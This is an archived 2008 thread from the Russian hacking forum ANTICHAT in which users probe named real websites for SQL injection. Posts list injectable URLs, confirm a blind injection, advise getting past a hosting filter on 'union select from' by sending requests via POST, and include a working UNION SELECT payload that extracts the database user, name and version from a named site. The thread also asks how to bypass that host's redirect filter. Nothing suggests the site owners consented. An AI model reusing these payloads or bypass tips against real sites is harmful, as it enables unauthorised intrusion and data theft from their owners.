ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

22.08.2008, 17:49
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме: 458686
Репутация:
-25
|
|
а вот это инекция http://rk-triada.ru/index.php?page=999??
И это http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=-999??
Последний раз редактировалось geforce; 22.08.2008 в 18:41..
|
|
|

22.08.2008, 19:01
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме: 611529
Репутация:
41
|
|
Фильтрация, хороший сайт хорошая sql на нём) Но from фильтруется, Можно это кат-то обойти?
Есть подозрение на хостинг.
 удалил
Последний раз редактировалось tor4); 22.08.2008 в 20:35..
|
|
|

22.08.2008, 19:40
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
tor4)
Это спейс веб, фильтрует не from, а последовательность union+select+from, обходится POST'ом
Последний раз редактировалось jokester; 22.08.2008 в 20:43..
|
|
|

22.08.2008, 22:19
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме: 3009843
Репутация:
204
|
|
Сообщение от geforce
а вот это инекция http://rk-triada.ru/index.php?page=999??
И это http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=-999??
Код:
http://rk-triada.ru/index.php?page=999-скорее всего есть,но это blind
http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=999-нет
|
|
|

23.08.2008, 01:35
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме: 458686
Репутация:
-25
|
|
Сообщение от Shaitan-Devil
Код:
http://rk-triada.ru/index.php?page=999-скорее всего есть,но это blind
http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=999-нет
А что значи blind???
|
|
|

23.08.2008, 01:38
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме: 10046345
Репутация:
4589
|
|
Сообщение от geforce
А что значи blind???
слепая скуля
|
|
|

23.08.2008, 03:05
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме: 458686
Репутация:
-25
|
|
Сообщение от BlackSun
слепая скуля
Подскажите как сней работать! Или дайте инфу?
|
|
|

23.08.2008, 03:31
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме: 10046345
Репутация:
4589
|
|
Сообщение от geforce
Подскажите как сней работать! Или дайте инфу?
https://forum.antichat.ru/thread35207.html
|
|
|

23.08.2008, 03:32
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме: 964766
Репутация:
228
|
|
Сообщение от geforce
Подскажите как сней работать! Или дайте инфу?
Вот например
http://forum.antichat.ru/thread56221-blind+sql.html
Также на Ачате есть статья по blind inj 
|
|
|

23.08.2008, 16:48
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме: 305110
Репутация:
133
|
|
хм столкнулся с такой проблемой есть скуль
Код:
http://www.stroyazbuka.com/news/index.php?idnews=9999999+and 1=1/*
количество столбцов подобраннно 13
при попытке вывести информацию о бд все нормально
Код:
http://www.stroyazbuka.com/news/index.php?idnews=99999999999+union+select+1,2,3,4,5,6,7,concat_ws(0x1,User(),Database(),Version()),9,10,11,12,13/*
а вот когда пытаюсь сделать Запрос в таблицу редирректит на
http://2.sweb.ru/insecure
Насколько я понимаю это фильрация которую делает хотинг ? и можно ли её обойти ?
|
|
|
|
 |
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|